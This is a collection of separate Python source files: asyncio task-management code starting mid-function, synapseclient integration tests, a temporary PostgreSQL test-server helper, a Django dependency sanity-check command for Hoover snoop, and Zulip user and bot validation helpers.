# TODO: figure out some way to forcibly close stuff
timeout = None
)
except Exception:
logger.error(
'Error while stopping remaining tasks: ' + repr(self) + '\n' +
''.join(traceback.format_exc())
)
# Reset everything so it's possible to run again.
finally:
results = self._results
self._results = {}
self._futures_by_mgmts = {}
self._mgmts_by_future = {}
return results
async def task_run(self):
''' Runs all of the TaskCommander's tasks.
'''
try:
# Get all of the tasks started.
all_tasks = await self._forward_harch()
incomplete_tasks = set(all_tasks)
# Perform any post-tasklooper-init, pre-init-complete actions.
await self.setup()
# All of the tasks have been started, and all of the inits have
# completed. Notify any waiters.
self._init_complete.set()
# Wait for all tasks to complete (unless cancelled), but process
# any issues as they happen.
finished = None
# Wait until the first successful task completion
while incomplete_tasks:
finished, pending = await asyncio.wait(
fs = incomplete_tasks,
return_when = asyncio.FIRST_COMPLETED
)
# It IS possible to return more than one complete task, even
# though we've used FIRST_COMPLETED
for finished_task in finished:
logger.debug('Task finished: ' + repr(finished_task))
self._handle_completed(finished_task)
incomplete_tasks.remove(finished_task)
except asyncio.CancelledError:
# Don't log the traceback itself.
logger.debug('TaskCommander cancelled: ' + repr(self))
raise
except Exception as exc:
logger.error(
'Error during task command w/ traceback:\n' +
''.join(traceback.format_exc())
)
raise
# No matter what happens, cancel all tasks at exit.
finally:
# But first, run cleanup.
try:
await self.teardown()
# Ensure we always clear all futures, regardless of whether or not
# they are already completed, since cancellation is idempotent.
# this way, we can avoid a race condition between tasks that were
# already cancelled or finished above, but who have not yet
# completed shutdown, and the loop itself stopping.
finally:
results = await self._company_halt(all_tasks)
# This may or may not be useful. In particular, it will only be reached
# if all tasks finish before cancellation.
return results
def _handle_completed(self, task):
''' Handles a TaskLooper that completes without cancellation.
'''
try:
# Reset the task startup primitive
mgmt = self._mgmts_by_future[task]
mgmt._startup_complete_flag.clear()
exc = task.exception()
# If there's been an exception, continue waiting for the rest.
if exc is not None:
# Note cancellations, but don't propagate them backwards.
if isinstance(exc, asyncio.CancelledError):
logger.info('Daughter task cancelled: ' + repr(mgmt))
elif self.suppress_child_exceptions:
logger.error(
'Exception while running ' + repr(mgmt) + 'w/ ' +
'traceback:\n' + ''.join(traceback.format_exception(
type(exc), exc, exc.__traceback__)
)
)
else:
raise exc
else:
self._results[mgmt] = task.result()
# Don't really do anything with these?
except asyncio.CancelledError:
logger.info('Task completion cancelled: ' + repr(mgmt))
async def _kill_tasks(self):
''' Kill all remaining tasks. Call during shutdown. Will log any
and all remaining tasks.
'''
all_tasks = asyncio.Task.all_tasks()
for task in all_tasks:
if task is not self._looper_future:
logger.info('Task remains while closing loop: ' + repr(task))
task.cancel()
if len(all_tasks) > 0:
await asyncio.wait(all_tasks, timeout=self._death_timeout)
async def await_init(self):
''' Awaits for all TaskLooper (or similar) loop_inits to finish.
'''
await self._init_complete.wait()
async def teardown(self):
''' Called after cancellation is started, but before it takes
effect. Use it to create a finalizer, if desired.
'''
async def setup(self):
''' Called after all tasks have been started, and all tasklooper
(or similar) instances have passed loop init.
'''
class Aengel:
''' Watches for completion of the main thread and then automatically
closes any other threaded objects (that have been registered with
the Aengel) by calling their close methods.
TODO: redo this as a subclass of threading.Thread.
'''
def __init__(self, threadname='aengel', guardlings=None):
''' Creates an aengel.
Uses threadname as the thread name.
guardlings is an iterable of threaded objects to watch. Each
must have a stop_threadsafe() method, which will be invoked upon
completion of the main thread, from the aengel's own thread. The
aengel WILL NOT prevent garbage collection of the guardling
objects; they are internally referenced weakly.
They will be called **in the order that they were added.**
'''
# I would really prefer this to be an orderedset, but oh well.
# That would actually break weakref proxies anyways.
self._guardlings = collections.deque()
self._dead = False
self._stoplock = threading.Lock()
if guardlings is not None:
for guardling in guardlings:
self.append_guardling(guardling)
self._thread = threading.Thread(
target = self._watcher,
daemon = True,
name = threadname,
)
self._thread.start()
def append_guardling(self, guardling):
if not isinstance(guardling, weakref.ProxyTypes):
guardling = weakref.proxy(guardling)
self._guardlings.append(guardling)
def prepend_guardling(self, guardling):
if not isinstance(guardling, weakref.ProxyTypes):
guardling = weakref.proxy(guardling)
self._guardlings.appendleft(guardling)
def remove_guardling(self, guardling):
''' Attempts to remove the first occurrence of the guardling.
Raises ValueError if guardling is unknown.
'''
try:
self._guardlings.remove(guardling)
except ValueError:
logger.error('Missing guardling ' + repr(guardling))
logger.error('State: ' + repr(self._guardlings))
raise
def _watcher(self):
''' Automatically watches for termination of the main thread and
then closes the autoresponder and server gracefully.
'''
main = threading.main_thread()
main.join()
self.stop()
def stop(self, *args, **kwargs):
''' Call stop_threadsafe on all guardlings.
'''
with self._stoplock:
if not self._dead:
for guardling in self._guardlings:
try:
guardling.stop_threadsafe_nowait()
except Exception:
# This is very precarious. Swallow all exceptions.
logger.error(
'Swallowed exception while closing ' +
repr(guardling) + '.\n' +
''.join(traceback.format_exc())
)
self._dead = True
class NoopLoop(TaskLooper):
''' Make a dummy event loop for manipulation of stuff. Intended for
use in testing.
'''
async def loop_run(self):
await asyncio.sleep(.1)
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import six
from builtins import str
import tempfile, time, os, re, sys, filecmp, shutil, requests, json
import uuid, random, base64
from datetime import datetime
from nose.tools import assert_raises
import synapseclient.client as client
import synapseclient.utils as utils
from synapseclient.exceptions import *
from synapseclient.evaluation import Evaluation
from synapseclient.entity import Project, File
from synapseclient.annotations import to_submission_status_annotations, from_submission_status_annotations, set_privacy
from synapseclient.team import Team, TeamMember
import integration
from integration import schedule_for_cleanup
def setup(module):
print('\n')
print('~' * 60)
print(os.path.basename(__file__))
print('~' * 60)
module.syn = integration.syn
module.project = integration.project
module.other_user = integration.other_user
def test_evaluations():
# Create an Evaluation
name = 'Test Evaluation %s' % str(uuid.uuid4())
ev = Evaluation(name=name, description='Evaluation for testing',
contentSource=project['id'], status='CLOSED')
ev = syn.store(ev)
try:
# -- Get the Evaluation by name
evalNamed = syn.getEvaluationByName(name)
assert ev['contentSource'] == evalNamed['contentSource']
assert ev['createdOn'] == evalNamed['createdOn']
assert ev['description'] == evalNamed['description']
assert ev['etag'] == evalNamed['etag']
assert ev['id'] == evalNamed['id']
assert ev['name'] == evalNamed['name']
assert ev['ownerId'] == evalNamed['ownerId']
assert ev['status'] == evalNamed['status']
# -- Get the Evaluation by project
evalProj = syn.getEvaluationByContentSource(project)
evalProj = next(evalProj)
assert ev['contentSource'] == evalProj['contentSource']
assert ev['createdOn'] == evalProj['createdOn']
assert ev['description'] == evalProj['description']
assert ev['etag'] == evalProj['etag']
assert ev['id'] == evalProj['id']
assert ev['name'] == evalProj['name']
assert ev['ownerId'] == evalProj['ownerId']
assert ev['status'] == evalProj['status']
# Update the Evaluation
ev['status'] = 'OPEN'
ev = syn.store(ev, createOrUpdate=True)
assert ev.status == 'OPEN'
# # Add the current user as a participant
myOwnerId = int(syn.getUserProfile()['ownerId'])
syn._allowParticipation(ev, myOwnerId)
# AUTHENTICATED_USERS = 273948
# PUBLIC = 273949
syn.setPermissions(ev, 273948, accessType=['READ'])
syn.setPermissions(ev, 273949, accessType=['READ'])
# test getPermissions
permissions = syn.getPermissions(ev, 273949)
assert ['READ'] == permissions
permissions = syn.getPermissions(ev, syn.getUserProfile()['ownerId'])
assert [p in permissions for p in ['READ', 'CREATE', 'DELETE', 'UPDATE', 'CHANGE_PERMISSIONS', 'READ_PRIVATE_SUBMISSION']]
# Test getSubmissions with no Submissions (SYNR-453)
submissions = syn.getSubmissions(ev)
assert len(list(submissions)) == 0
# -- Get a Submission attachment belonging to another user (SYNR-541) --
# See if the configuration contains test authentication
if other_user['username']:
print("Testing SYNR-541")
# Login as the test user
testSyn = client.Synapse(skip_checks=True)
testSyn.login(email=other_user['username'], password=other_user['password'])
testOwnerId = int(testSyn.getUserProfile()['ownerId'])
# Make a project
other_project = Project(name=str(uuid.uuid4()))
other_project = testSyn.createEntity(other_project)
# Give the test user permission to read and join the evaluation
syn._allowParticipation(ev, testOwnerId)
# Make a file to submit
with tempfile.NamedTemporaryFile(mode="w", delete=False) as f:
filename = f.name
f.write(str(random.gauss(0,1)) + '\n')
f = File(filename, parentId=other_project.id,
name='Submission 999',
description ="Haha! I'm inaccessible...")
entity = testSyn.store(f)
## test submission by evaluation ID
submission = testSyn.submit(ev.id, entity, submitterAlias="My Nickname")
# Mess up the cached file so that syn._getWithEntityBundle must download again
os.utime(filename, (0, 0))
# Grab the Submission as the original user
fetched = syn.getSubmission(submission['id'])
assert os.path.exists(fetched['filePath'])
# make sure the fetched file is the same as the original (PLFM-2666)
assert filecmp.cmp(filename, fetched['filePath'])
else:
print('Skipping test for SYNR-541: No [test-authentication] in %s' % client.CONFIG_FILE)
# Increase this to fully test paging by getEvaluationSubmissions
# not to be less than 2
num_of_submissions = 2
# Create a bunch of Entities and submit them for scoring
print("Creating Submissions")
for i in range(num_of_submissions):
with tempfile.NamedTemporaryFile(mode="w", delete=False) as f:
filename = f.name
f.write(str(random.gauss(0,1)) + '\n')
f = File(filename, parentId=project.id, name='entry-%02d' % i,
description='An entry for testing evaluation')
entity=syn.store(f)
syn.submit(ev, entity, name='Submission %02d' % i, submitterAlias='My Team')
# Score the submissions
submissions = syn.getSubmissions(ev, limit=num_of_submissions-1)
print("Scoring Submissions")
for submission in submissions:
assert re.match('Submission \d+', submission['name'])
status = syn.getSubmissionStatus(submission)
status.score = random.random()
if submission['name'] == 'Submission 01':
status.status = 'INVALID'
status.report = 'Uh-oh, something went wrong!'
else:
status.status = 'SCORED'
status.report = 'a fabulous effort!'
syn.store(status)
# Annotate the submissions
print("Annotating Submissions")
bogosity = {}
submissions = syn.getSubmissions(ev)
b = 123
for submission, status in syn.getSubmissionBundles(ev):
bogosity[submission.id] = b
a = dict(foo='bar', bogosity=b)
b += 123
status['annotations'] = to_submission_status_annotations(a)
set_privacy(status['annotations'], key='bogosity', is_private=False)
syn.store(status)
# Test that the annotations stuck
for submission, status in syn.getSubmissionBundles(ev):
a = from_submission_status_annotations(status.annotations)
assert a['foo'] == 'bar'
assert a['bogosity'] == bogosity[submission.id]
for kvp in status.annotations['longAnnos']:
if kvp['key'] == 'bogosity':
assert kvp['isPrivate'] == False
# test query by submission annotations
# These queries run against an eventually consistent index table which is
# populated by an asynchronous worker. Thus, the queries may remain out
# of sync for some unbounded, but assumed to be short time.
attempts = 2
while attempts > 0:
try:
print("Querying for submissions")
results = syn.restGET("/evaluation/submission/query?query=SELECT+*+FROM+evaluation_%s" % ev.id)
print(results)
assert len(results['rows']) == num_of_submissions+1
results = syn.restGET("/evaluation/submission/query?query=SELECT+*+FROM+evaluation_%s where bogosity > 200" % ev.id)
print(results)
assert len(results['rows']) == num_of_submissions
except AssertionError as ex1:
print("failed query: ", ex1)
attempts -= 1
if attempts > 0: print("retrying...")
time.sleep(2)
else:
attempts = 0
## Test that we can retrieve submissions with a specific status
invalid_submissions = list(syn.getSubmissions(ev, status='INVALID'))
assert len(invalid_submissions) == 1, len(invalid_submissions)
assert invalid_submissions[0]['name'] == 'Submission 01'
finally:
# Clean up
syn.delete(ev)
if 'testSyn' in locals():
if 'other_project' in locals():
# Clean up, since the current user can't access this project
# This also removes references to the submitted object :)
testSyn.delete(other_project)
if 'team' in locals():
## remove team
testSyn.delete(team)
## Just deleted it. Shouldn't be able to get it.
assert_raises(SynapseHTTPError, syn.getEvaluation, ev)
def test_teams():
name = "My Uniquely Named Team " + str(uuid.uuid4())
team = syn.store(Team(name=name, description="A fake team for testing..."))
schedule_for_cleanup(team)
found_team = syn.getTeam(team.id)
assert team == found_team
p = syn.getUserProfile()
found = None
for m in syn.getTeamMembers(team):
if m.member.ownerId == p.ownerId:
found = m
break
assert found is not None, "Couldn't find user {} in team".format(p.username)
## needs to be retried 'cause appending to the search index is asynchronous
tries = 10
found_team = None
while tries > 0:
try:
found_team = syn.getTeam(name)
break
except ValueError:
tries -= 1
if tries > 0: time.sleep(1)
assert team == found_team
| |
# -*- coding: utf-8 -*-
# Copyright 2013 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import socket
import signal
import pg8000
import tempfile
import subprocess
from glob import glob
from time import sleep
from shutil import copytree, rmtree
from datetime import datetime
from contextlib import closing
__all__ = ['Postgresql', 'skipIfNotFound']
SEARCH_PATHS = (['/usr/local/pgsql', '/usr/local'] +
glob('/usr/lib/postgresql/*') + # for Debian/Ubuntu
glob('/opt/local/lib/postgresql*')) # for MacPorts
DEFAULT_SETTINGS = dict(auto_start=2,
base_dir=None,
initdb=None,
initdb_args='-U postgres -A trust',
postgres=None,
postgres_args='-h 127.0.0.1 -F -c logging_collector=off',
pid=None,
port=None,
copy_data_from=None)
class Postgresql(object):
def __init__(self, **kwargs):
self.settings = dict(DEFAULT_SETTINGS)
self.settings.update(kwargs)
self.pid = None
self._owner_pid = os.getpid()
self._use_tmpdir = False
if self.base_dir:
if self.base_dir[0] != '/':
self.settings['base_dir'] = os.path.join(os.getcwd(), self.base_dir)
else:
self.settings['base_dir'] = tempfile.mkdtemp()
self._use_tmpdir = True
if self.initdb is None:
self.settings['initdb'] = find_program('initdb', ['bin'])
if self.postgres is None:
self.settings['postgres'] = find_program('postgres', ['bin'])
if self.auto_start:
if self.auto_start >= 2:
self.setup()
self.start()
def __del__(self):
self.stop()
def __enter__(self):
return self
def __exit__(self, *args):
self.stop()
def __getattr__(self, name):
if name in self.settings:
return self.settings[name]
else:
raise AttributeError("'Postgresql' object has no attribute '%s'" % name)
def dsn(self, **kwargs):
# "database=test host=localhost user=postgres"
params = dict(kwargs)
params.setdefault('port', self.port)
params.setdefault('host', '127.0.0.1')
params.setdefault('user', 'postgres')
params.setdefault('database', 'test')
return params
def url(self, **kwargs):
params = self.dsn(**kwargs)
url = ('postgresql://%s@%s:%d/%s' %
(params['user'], params['host'], params['port'], params['database']))
return url
def setup(self):
# copy data files
if self.copy_data_from:
try:
copytree(self.copy_data_from, os.path.join(self.base_dir, 'data'))
os.chmod(os.path.join(self.base_dir, 'data'), 0o700)
except Exception as exc:
raise RuntimeError("could not copytree %s to %s: %r" %
(self.copy_data_from, os.path.join(self.base_dir, 'data'), exc))
# (re)create directory structure
for subdir in ['data', 'tmp']:
path = os.path.join(self.base_dir, subdir)
if not os.path.exists(path):
os.makedirs(path)
os.chmod(path, 0o700)
# initdb
if not os.path.exists(os.path.join(self.base_dir, 'data', 'PG_VERSION')):
args = ([self.initdb, '-D', os.path.join(self.base_dir, 'data'), '--lc-messages=C'] +
self.initdb_args.split())
try:
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, err = p.communicate()
if p.returncode != 0:
raise RuntimeError("initdb failed: %r" % err)
except OSError as exc:
raise RuntimeError("failed to spawn initdb: %s" % exc)
def start(self):
if self.pid:
return # already started
if self.port is None:
self.port = get_unused_port()
logger = open(os.path.join(self.base_dir, 'tmp', 'postgresql.log'), 'wt')
pid = os.fork()
if pid == 0:
os.dup2(logger.fileno(), sys.__stdout__.fileno())
os.dup2(logger.fileno(), sys.__stderr__.fileno())
try:
os.execl(self.postgres, self.postgres,
'-p', str(self.port),
'-D', os.path.join(self.base_dir, 'data'),
'-k', os.path.join(self.base_dir, 'tmp'),
*self.postgres_args.split())
except Exception as exc:
raise RuntimeError('failed to launch postgres: %r' % exc)
else:
logger.close()
self.pid = pid
exec_at = datetime.now()
while True:
if os.waitpid(pid, os.WNOHANG)[0] != 0:
raise RuntimeError("*** failed to launch postgres ***\n" + self.read_log())
if self.is_connection_available():
break
if (datetime.now() - exec_at).seconds > 10.0:
raise RuntimeError("*** failed to launch postgres (timeout) ***\n" + self.read_log())
sleep(0.1)
# create test database
with closing(pg8000.connect(**self.dsn(database='postgres'))) as conn:
conn.autocommit = True
with closing(conn.cursor()) as cursor:
cursor.execute("SELECT COUNT(*) FROM pg_database WHERE datname='test'")
if cursor.fetchone()[0] <= 0:
cursor.execute('CREATE DATABASE test')
def stop(self, _signal=signal.SIGINT):
self.terminate(_signal)
self.cleanup()
def terminate(self, _signal=signal.SIGINT):
if self.pid is None:
return # not started
if self._owner_pid != os.getpid():
return # could not stop in child process
try:
os.kill(self.pid, _signal)
killed_at = datetime.now()
while (os.waitpid(self.pid, os.WNOHANG)):
if (datetime.now() - killed_at).seconds > 10.0:
os.kill(self.pid, signal.SIGKILL)
raise RuntimeError("*** failed to shutdown postgres (timeout) ***\n" + self.read_log())
sleep(0.1)
except OSError:
pass
self.pid = None
def cleanup(self):
if self.pid is not None:
return
if self._use_tmpdir and os.path.exists(self.base_dir):
rmtree(self.base_dir, ignore_errors=True)
self._use_tmpdir = False
def read_log(self):
try:
with open(os.path.join(self.base_dir, 'tmp', 'postgresql.log')) as log:
return log.read()
except Exception as exc:
raise RuntimeError("failed to open file:tmp/postgresql.log: %r" % exc)
def is_connection_available(self):
try:
with closing(pg8000.connect(**self.dsn(database='template1'))):
pass
except pg8000.Error:
return False
else:
return True
def skipIfNotInstalled(arg=None):
if sys.version_info < (2, 7):
from unittest2 import skipIf
else:
from unittest import skipIf
def decorator(fn, path=arg):
if path:
cond = not os.path.exists(path)
else:
try:
find_program('postgres', ['bin']) # raise exception if not found
cond = False
except:
cond = True # not found
return skipIf(cond, "PostgreSQL not found")(fn)
if callable(arg): # execute as simple decorator
return decorator(arg, None)
else: # execute with path argument
return decorator
skipIfNotFound = skipIfNotInstalled
def find_program(name, subdirs):
path = get_path_of(name)
if path:
return path
for base_dir in SEARCH_PATHS:
for subdir in subdirs:
path = os.path.join(base_dir, subdir, name)
if os.path.exists(path):
return path
raise RuntimeError("command not found: %s" % name)
def get_path_of(name):
path = subprocess.Popen(['/usr/bin/which', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
if path:
return path.rstrip().decode('utf-8')
else:
return None
def get_unused_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
| |
from pathlib import Path
import subprocess
import re
import sys
import urllib.request
import urllib.error
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import connections
from django.db.utils import OperationalError
ELASTICSEARCH_MIN_VERSION = (2, 0, 0)
ELASTICSEARCH_MAX_VERSION = (2, 4, 4)
PST_MIN_VERSION = (0, 2, 0)
TIKA_MIN_VERSION = (1, 13)
def path_exists(path):
return Path(path).exists()
def http_get_content(link):
try:
with urllib.request.urlopen(link) as content:
return content.read()
except (urllib.error.HTTPError, urllib.error.URLError):
return None
def get_version(exe_path, version_argument='--version',
regex=r'([\d\.]+)', check_output=True,
is_numeric=True):
if check_output:
output = subprocess.check_output([exe_path, version_argument])
else:
completed = subprocess.run(
[exe_path, version_argument],
check=False,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE)
output = completed.stdout
string_output = str(output)
matches = re.search(regex, string_output, re.MULTILINE)
if not matches:
return None
if is_numeric:
return tuple(int(x) for x in matches.group(1).split("."))
return matches.group(1)
class Command(BaseCommand):
help = "Sanity check for snoop. Run with no arguments."
def handle(self, *args, **options):
checkers = [
('python', self.check_python, False),
('database', self.check_database, False),
('elasticsearch', self.check_es, False),
('msgconvert', self.check_msgconvert, settings.SNOOP_MSGCONVERT_SCRIPT is None),
('readpst', self.check_readpst, settings.SNOOP_READPST_BINARY is None),
('Apache Tika', self.check_tika, settings.SNOOP_TIKA_SERVER_ENDPOINT is None),
('7z', self.check_7z, settings.SNOOP_SEVENZIP_BINARY is None),
('gpg', self.check_gpg, settings.SNOOP_GPG_BINARY is None),
]
have_errors = False
for name, check_fun, skip in checkers:
if skip:
self.print_message("Skipping the check for " + name + ".")
else:
self.print_message("Checking " + name + ".")
result = check_fun()
if result:
self.print_success(' ' * 9 + name + " ok.")
else:
have_errors = True
self.print_error(name + " failed the check.")
self.print_message('')
if have_errors:
self.print_error("The setup has failed some checks.")
self.print_error("For more information please see")
self.print_error("https://github.com/hoover/snoop/blob/master/Readme.md")
sys.exit(1)
else:
self.print_success("All checks have passed.")
def check_python(self):
if sys.version_info[0] != 3 or sys.version_info[1] < 5:
self.print_error("The Python version supplied is {}.".format(sys.version))
self.print_error("Hoover needs at least Python 3.5 to work.")
self.print_error("Please use a supported version of Python.")
return False
return True
def check_database(self):
db_conn = connections['default']
try:
c = db_conn.cursor()
except OperationalError:
self.print_error("The database settings are not valid.")
self.print_error("Please check the database access data under DATABASES.")
return False
return True
def check_msgconvert(self):
msgconvert_path = settings.SNOOP_MSGCONVERT_SCRIPT
if not path_exists(msgconvert_path):
self.print_error("You enabled msgconvert support but")
self.print_error("SNOOP_MSGCONVERT_SCRIPT is not set to a valid path.")
return False
version = get_version(msgconvert_path, '--help', regex='(msgconvert)',
check_output=False, is_numeric=False)
if not version:
self.print_error("Could run the script provided in SNOOP_MSGCONVERT_SCRIPT")
return False
cache_dir = settings.SNOOP_MSG_CACHE
if not cache_dir or not Path(cache_dir).is_dir():
self.print_error("SNOOP_MSG_CACHE does not point to a valid directory.")
return False
return True
def check_readpst(self):
readpst_path = settings.SNOOP_READPST_BINARY
if not path_exists(readpst_path):
self.print_error("You enabled readpst support but")
self.print_error("SNOOP_READPST_BINARY is not set to a valid path.")
return False
version = get_version(readpst_path, '-V')
if not version:
self.print_error("Failed to check the readpst version.")
self.print_error("Please check if SNOOP_READPST_BINARY points to a valid executable.")
return False
if version < PST_MIN_VERSION:
self.print_error("Please install a more recent version of readpst.")
return False
cache_dir = settings.SNOOP_PST_CACHE_ROOT
if not cache_dir or not Path(cache_dir).is_dir():
self.print_error("SNOOP_PST_CACHE_ROOT does not point to a valid directory.")
return False
return True
def check_es(self):
es_link = settings.SNOOP_ELASTICSEARCH_URL
content = http_get_content(es_link)
if not content:
self.print_error("Could not connect to elasticsearch using")
self.print_error("the link supplied in SNOOP_ELASTICSEARCH_URL.")
return False
try:
data = json.loads(content)
except json.JSONDecodeError:
self.print_error("elasticsearch's response could not be decoded.")
self.print_error("Please restart the elasticsearch server and try again.")
return False
version_string = data['version']['number']
version_string = re.sub(r'[^\d\.]+', '', version_string)
version = tuple(int(x) for x in version_string.split('.'))
if not ELASTICSEARCH_MIN_VERSION <= version <= ELASTICSEARCH_MAX_VERSION:
self.print_error("elasticsearch is version {}, but".format(version))
self.print_error("Hoover needs elasticsearch to be in between versions")
self.print_error("{} and {}".format(ELASTICSEARCH_MIN_VERSION,
ELASTICSEARCH_MAX_VERSION))
return False
return True
def check_tika(self):
tika_link = settings.SNOOP_TIKA_SERVER_ENDPOINT
content = http_get_content(tika_link + "/version")
if not content:
self.print_error("Could not connect to Apache Tika using")
self.print_error("the link supplied in SNOOP_TIKA_SERVER_ENDPOINT.")
return False
version_string = str(content)
matches = re.search('([\d\.]+)', version_string, re.MULTILINE)
if not matches:
self.print_error("Apache Tika's response did not contain a valid version number.")
self.print_error("Please restart the Apache Tika server and try again.")
return False
version_string = matches.group(1)
version = tuple(int(x) for x in version_string.split('.'))
if version < TIKA_MIN_VERSION:
self.print_error("tika is version {}, but")
self.print_error("Hoover needs tika to be at least version {}".format(TIKA_MIN_VERSION))
self.print_error("Download tika from https://tika.apache.org/download")
return False
return True
def check_7z(self):
seven_zip_path = settings.SNOOP_SEVENZIP_BINARY
if not path_exists(seven_zip_path):
self.print_error("You enabled 7z support but")
self.print_error("SNOOP_SEVENZIP_BINARY is not set to a valid path.")
return False
version = get_version(seven_zip_path, '--help', r'Version +([\d\.]+)', is_numeric=False)
if not version:
self.print_error("Failed to check the version for 7z.")
self.print_error("Please check if SNOOP_SEVENZIP_BINARY points to a valid executable.")
return False
cache_dir = settings.SNOOP_ARCHIVE_CACHE_ROOT
if not cache_dir or not Path(cache_dir).is_dir():
self.print_error("SNOOP_ARCHIVE_CACHE_ROOT does not point to a valid directory.")
return False
return True
def check_gpg(self):
gpg_path = settings.SNOOP_GPG_BINARY
if not path_exists(gpg_path):
self.print_error("You enabled gpg support but")
self.print_error("SNOOP_GPG_BINARY is not set to a valid path.")
return False
version = get_version(gpg_path)
if not version:
self.print_error("Failed to check the version for gpg.")
self.print_error("Please check if SNOOP_GPG_BINARY points to a valid executable.")
return False
cache_dir = settings.SNOOP_GPG_HOME
if not cache_dir or not Path(cache_dir).is_dir():
self.print_error("SNOOP_GPG_HOME does not point to a valid directory.")
return False
return True
def print_error(self, string):
self.stdout.write(self.style.ERROR(string))
def print_message(self, string):
self.stdout.write(string)
def print_success(self, string):
self.stdout.write(self.style.SUCCESS(string))
| |
from typing import Dict, List, Optional, Union, cast
from django.db.models.query import QuerySet
from django.utils.translation import ugettext as _
from django.conf import settings
from zerver.lib.cache import generic_bulk_cached_fetch, user_profile_cache_key_id, \
user_profile_by_id_cache_key
from zerver.lib.request import JsonableError
from zerver.lib.avatar import avatar_url
from zerver.models import UserProfile, Service, Realm, \
get_user_profile_by_id, query_for_ids, get_user_profile_by_id_in_realm, \
CustomProfileField
from zulip_bots.custom_exceptions import ConfigValidationError
def check_full_name(full_name_raw: str) -> str:
full_name = full_name_raw.strip()
if len(full_name) > UserProfile.MAX_NAME_LENGTH:
raise JsonableError(_("Name too long!"))
if len(full_name) < UserProfile.MIN_NAME_LENGTH:
raise JsonableError(_("Name too short!"))
if list(set(full_name).intersection(UserProfile.NAME_INVALID_CHARS)):
raise JsonableError(_("Invalid characters in name!"))
return full_name
# NOTE: We don't try to absolutely prevent 2 bots from having the same
# name (e.g. you can get there by reactivating a deactivated bot after
# making a new bot with the same name). This is just a check designed
# to make it unlikely to happen by accident.
def check_bot_name_available(realm_id: int, full_name: str) -> None:
dup_exists = UserProfile.objects.filter(
realm_id=realm_id,
full_name=full_name.strip(),
is_active=True,
).exists()
if dup_exists:
raise JsonableError(_("Name is already in use!"))
def check_short_name(short_name_raw: str) -> str:
short_name = short_name_raw.strip()
if len(short_name) == 0:
raise JsonableError(_("Bad name or username"))
return short_name
def check_valid_bot_config(service_name: str, config_data: Dict[str, str]) -> None:
try:
from zerver.lib.bot_lib import get_bot_handler
bot_handler = get_bot_handler(service_name)
if hasattr(bot_handler, 'validate_config'):
bot_handler.validate_config(config_data)
except ConfigValidationError:
# The exception provides a specific error message, but that
# message is not tagged translatable, because it is
# triggered in the external zulip_bots package.
# TODO: Think of some clever way to provide a more specific
# error message.
raise JsonableError(_("Invalid configuration data!"))
# Adds an outgoing webhook or embedded bot service.
def add_service(name: str, user_profile: UserProfile, base_url: Optional[str]=None,
interface: Optional[int]=None, token: Optional[str]=None) -> None:
Service.objects.create(name=name,
user_profile=user_profile,
base_url=base_url,
interface=interface,
token=token)
def check_bot_creation_policy(user_profile: UserProfile, bot_type: int) -> None:
# Realm administrators can always add bot
if user_profile.is_realm_admin:
return
if user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_EVERYONE:
return
if user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_ADMINS_ONLY:
raise JsonableError(_("Must be an organization administrator"))
if user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_LIMIT_GENERIC_BOTS and \
bot_type == UserProfile.DEFAULT_BOT:
raise JsonableError(_("Must be an organization administrator"))
def check_valid_bot_type(user_profile: UserProfile, bot_type: int) -> None:
if bot_type not in user_profile.allowed_bot_types:
raise JsonableError(_('Invalid bot type'))
def check_valid_interface_type(interface_type: Optional[int]) -> None:
if interface_type not in Service.ALLOWED_INTERFACE_TYPES:
raise JsonableError(_('Invalid interface type'))
def bulk_get_users(emails: List[str], realm: Optional[Realm],
base_query: 'QuerySet[UserProfile]'=None) -> Dict[str, UserProfile]:
if base_query is None:
assert realm is not None
query = UserProfile.objects.filter(realm=realm, is_active=True)
realm_id = realm.id
else:
# WARNING: Currently, this code path only really supports one
# version of `base_query` being used (because otherwise,
# they'll share the cache, which can screw up the filtering).
# If you're using this flow, you'll need to re-do any filters
# in base_query in the code itself; base_query is just a perf
# optimization.
query = base_query
realm_id = 0
def fetch_users_by_email(emails: List[str]) -> List[UserProfile]:
# This should be just
#
# UserProfile.objects.select_related("realm").filter(email__iexact__in=emails,
# realm=realm)
#
# But chaining __in and __iexact doesn't work with Django's
# ORM, so we have the following hack to construct the relevant where clause
if len(emails) == 0:
return []
upper_list = ", ".join(["UPPER(%s)"] * len(emails))
where_clause = "UPPER(zerver_userprofile.email::text) IN (%s)" % (upper_list,)
return query.select_related("realm").extra(
where=[where_clause],
params=emails)
return generic_bulk_cached_fetch(
# Use a separate cache key to protect us from conflicts with
# the get_user cache.
lambda email: 'bulk_get_users:' + user_profile_cache_key_id(email, realm_id),
fetch_users_by_email,
[email.lower() for email in emails],
id_fetcher=lambda user_profile: user_profile.email.lower()
)
def user_ids_to_users(user_ids: List[int], realm: Realm) -> List[UserProfile]:
# TODO: Consider adding a flag to control whether deactivated
# users should be included.
def fetch_users_by_id(user_ids: List[int]) -> List[UserProfile]:
if len(user_ids) == 0:
return []
return list(UserProfile.objects.filter(id__in=user_ids).select_related())
user_profiles_by_id = generic_bulk_cached_fetch(
cache_key_function=user_profile_by_id_cache_key,
query_function=fetch_users_by_id,
object_ids=user_ids
) # type: Dict[int, UserProfile]
found_user_ids = user_profiles_by_id.keys()
missed_user_ids = [user_id for user_id in user_ids if user_id not in found_user_ids]
if missed_user_ids:
raise JsonableError(_("Invalid user ID: %s" % (missed_user_ids[0])))
user_profiles = list(user_profiles_by_id.values())
for user_profile in user_profiles:
if user_profile.realm != realm:
raise JsonableError(_("Invalid user ID: %s" % (user_profile.id,)))
